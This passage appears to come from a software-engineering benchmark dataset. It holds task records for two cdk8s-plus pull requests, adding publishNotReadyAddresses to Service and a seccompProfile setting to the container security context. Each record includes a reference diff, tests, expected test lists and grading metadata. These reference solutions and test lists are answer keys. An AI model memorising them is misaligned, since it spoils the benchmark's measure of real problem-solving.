Hence the task is clearly defined and test-aligned, qualifying as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
52f2dc56533098c969c1d9338f1bf6301051b41a
2024-08-12 08:51:11
cdk8s-team__cdk8s-plus-4510
diff --git a/src/service.ts b/src/service.ts index 871ab86b..27bb6a5f 100644 --- a/src/service.ts +++ b/src/service.ts @@ -94,6 +94,16 @@ export interface ServiceProps extends base.ResourceProps { */ readonly loadBalancerSourceRanges?: string[]; + /** + * The publishNotReadyAddresses indicates that any agent which deals with endpoints for this Service + * should disregard any indications of ready/not-ready + * + * More info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core + * + * @default - false + */ + readonly publishNotReadyAddresses?: boolean; + } /** @@ -210,6 +220,7 @@ export class Service extends base.Resource { private readonly _selector: Record<string, string>; private readonly _ports: ServicePort[]; private readonly _loadBalancerSourceRanges?: string[]; + private readonly _publishNotReadyAddresses?: boolean; constructor(scope: Construct, id: string, props: ServiceProps = {}) { super(scope, id); @@ -232,6 +243,7 @@ export class Service extends base.Resource { this._ports = []; this._selector = { }; this._loadBalancerSourceRanges = props.loadBalancerSourceRanges; + this._publishNotReadyAddresses = props.publishNotReadyAddresses; if (props.selector) { this.select(props.selector); @@ -337,6 +349,7 @@ export class Service extends base.Resource { selector: this._selector, ports: ports, loadBalancerSourceRanges: this._loadBalancerSourceRanges, + publishNotReadyAddresses: this._publishNotReadyAddresses, } : { type: this.type, externalName: this.externalName,
feat(service): support `publishNotReadyAddresses` (#4500) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [feat(service): support `publishNotReadyAddresses` (#4500)](https://github.com/cdk8s-team/cdk8s-plus/pull/4500) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for `publishNotReadyAddresses` on Service resources **Problem** Consumers need the ability to expose endpoints of pods that are not yet marked ready. The Service construct previously lacked a way to configure this behavior, limiting use‑cases that rely on early traffic routing or mesh integrations. **Root Cause** The Service spec field `publishNotReadyAddresses` was not exposed in the construct’s API, so the generated manifests always omitted it. **Fix / Expected Behavior** - Introduce an optional boolean flag in the Service properties to control `publishNotReadyAddresses`. - Store the flag internally when a Service is instantiated. - Include the flag in the rendered Service manifest when set, defaulting to false when omitted. - Preserve existing behavior for all other Service configuration options. **Risk & Validation** - Verify that the new property does not interfere with existing Service types or selector logic. - Ensure generated manifests correctly reflect the flag only when explicitly enabled. - Run the full test suite and add a regression test confirming the field appears with the expected value.
4,510
cdk8s-team/cdk8s-plus
diff --git a/test/service.test.ts b/test/service.test.ts index 48083e87..106de6bf 100644 --- a/test/service.test.ts +++ b/test/service.test.ts @@ -185,3 +185,14 @@ test('can be exposed by an ingress', () => { const ingress = Testing.synth(chart)[1]; expect(ingress).toMatchSnapshot(); }); + +test('can set publishNotReadyAddresses', () => { + const chart = Testing.chart(); + new kplus.Service(chart, 'service', { + ports: [{ port: 80 }], + publishNotReadyAddresses: true, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.publishNotReadyAddresses).toBeTruthy(); +});
[ "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can select namespaces", "can select all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default configuration", "custom configuration", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice 
to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an 
immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip 
block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU 
metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at 
synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be 
used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container 
post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces 
selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Service.constructor(self, scope: Construct, id: string, props: ServiceProps = {}) Location: src/service.ts Inputs: - **scope** – Construct : parent construct in which the Service is defined. - **id** – string : logical identifier for the Service construct. - **props** – ServiceProps : configuration object; now includes optional **publishNotReadyAddresses?: boolean** that, when true, sets the Service spec field `publishNotReadyAddresses`. Outputs: Returns a new **Service** instance. The generated Kubernetes manifest includes `spec.publishNotReadyAddresses` set to the boolean value provided (default false). Description: Constructs a Service resource. The recent signature change adds the `publishNotReadyAddresses` option, allowing callers (e.g., tests) to configure the Service to expose endpoints regardless of readiness status.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 13, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for `publishNotReadyAddresses` to the Service construct. The test added checks that when the flag is set to true, the generated Service spec includes `publishNotReadyAddresses: true`, which matches the expected feature behavior. The test assertions align with the implied requirement and do not introduce unrelated expectations. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
cd45d5968ac322367a29972d6fb7af9bcd66c5ba
2024-08-14 10:15:12
cdk8s-team__cdk8s-plus-4521
diff --git a/src/container.ts b/src/container.ts index 77b8d202..f145ff0f 100644 --- a/src/container.ts +++ b/src/container.ts @@ -181,6 +181,37 @@ export enum Capability { WAKE_ALARM = 'WAKE_ALARM', } +export enum SeccompProfileType { + /** + * A profile defined in a file on the node should be used + */ + LOCALHOST = 'Localhost', + /** + * The container runtime default profile should be used + */ + RUNTIME_DEFAULT = 'RuntimeDefault', + /** + * No profile should be applied + */ + UNCONFINED = 'Unconfined', +} + +export interface SeccompProfile { + /** + * localhostProfile indicates a profile defined in a file on the node should be used. + * The profile must be preconfigured on the node to work. Must be a descending path, + * relative to the kubelet's configured seccomp profile location. + * Must only be set if type is "Localhost". + * + * @default - empty string + */ + readonly localhostProfile?: string; + /** + * Indicates which kind of seccomp profile will be applied + */ + readonly type: SeccompProfileType; +} + export interface ContainerSecutiryContextCapabilities { /** * Added capabilities @@ -252,6 +283,13 @@ export interface ContainerSecurityContextProps { * @default none */ readonly capabilities?: ContainerSecutiryContextCapabilities; + + /** + * Container's seccomp profile settings. Only one profile source may be set + * + * @default none + */ + readonly seccompProfile?: SeccompProfile; } /** @@ -331,8 +369,12 @@ export class ContainerSecurityContext { public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; public readonly capabilities?: ContainerSecutiryContextCapabilities; + public readonly seccompProfile?: SeccompProfile; constructor(props: ContainerSecurityContextProps = {}) { + if (props.seccompProfile?.localhostProfile && props.seccompProfile.type != SeccompProfileType.LOCALHOST) { + throw new Error('localhostProfile must only be set if type is "Localhost"'); + } this.ensureNonRoot = props.ensureNonRoot ?? 
true; this.privileged = props.privileged ?? false; this.readOnlyRootFilesystem = props.readOnlyRootFilesystem ?? true; @@ -340,6 +382,7 @@ export class ContainerSecurityContext { this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; this.capabilities = props.capabilities; + this.seccompProfile = props.seccompProfile; } /** @@ -354,6 +397,7 @@ export class ContainerSecurityContext { readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, capabilities: this.capabilities, + seccompProfile: this.seccompProfile, }; }
feat(container): support seccompProfile in container security context (#4499) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [feat(container): support seccompProfile in container security context (#4499)](https://github.com/cdk8s-team/cdk8s-plus/pull/4499) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add seccomp profile support to container security contexts **Problem** Container security contexts did not expose any way to configure seccomp profiles, preventing users from applying fine‑grained syscall filtering to their workloads. **Root Cause** The security context model lacked fields and validation logic for seccomp profile configuration. **Fix / Expected Behavior** - Introduce a set of seccomp profile types (Localhost, RuntimeDefault, Unconfined). - Provide a seccomp profile definition that includes the profile type and an optional file‑based profile path. - Add an optional seccompProfile property to the container security context configuration. - Validate that a file‑based profile path can only be supplied when the type is Localhost, otherwise raise a clear error. - Ensure the seccomp profile information is emitted in the generated pod spec when defined. **Risk & Validation** - Confirm that existing container definitions without seccomp settings are unaffected. - Test that an invalid combination of type and localhostProfile triggers the intended runtime error. - Verify that the rendered Kubernetes manifest includes the seccompProfile block only when it is specified.
4,521
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index f1795cd4..4b4a2ed2 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy, SeccompProfileType } from '../src'; describe('EnvValue', () => { @@ -778,6 +778,7 @@ test('default security context', () => { runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, capabilities: container.securityContext.capabilities, + seccompProfile: container.securityContext.seccompProfile, }); }); @@ -799,6 +800,9 @@ test('custom security context', () => { Capability.BPF, ], }, + seccompProfile: { + type: SeccompProfileType.RUNTIME_DEFAULT, + }, }, }); @@ -809,7 +813,37 @@ test('custom security context', () => { expect(container.securityContext.group).toEqual(2000); expect(container.securityContext.capabilities?.add).toEqual(['AUDIT_CONTROL']); expect(container.securityContext.capabilities?.drop).toEqual(['BPF']); + expect(container.securityContext.seccompProfile?.type).toEqual('RuntimeDefault'); + +}); +test('seccompProfile localhostProfile can not be used if type is not Localhost', () => { + + const container = new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.LOCALHOST, + localhostProfile: 'localhostProfile', + }, + }, + }); + + const spec = container._toKube(); + expect(spec.securityContext?.seccompProfile?.localhostProfile).toEqual('localhostProfile'); +}); + +test('seccompProfile localhostProfile must only be set if type is Localhost', () => { + + expect(() => new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: 
SeccompProfileType.UNCONFINED, + localhostProfile: 'localhostProfile', + }, + }, + })).toThrowError('localhostProfile must only be set if type is "Localhost"'); }); test('can configure a postStart lifecycle hook', () => {
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", 
"\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can mutate metadata", "default configuration", "custom configuration", "Can be isolated", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "fromCommand", "fromHttpGet", "fromTcpSocket", "can select namespaces", "can select all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the 
same path (no host)", "two rules for the same path and host", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods 
and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - 
default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can 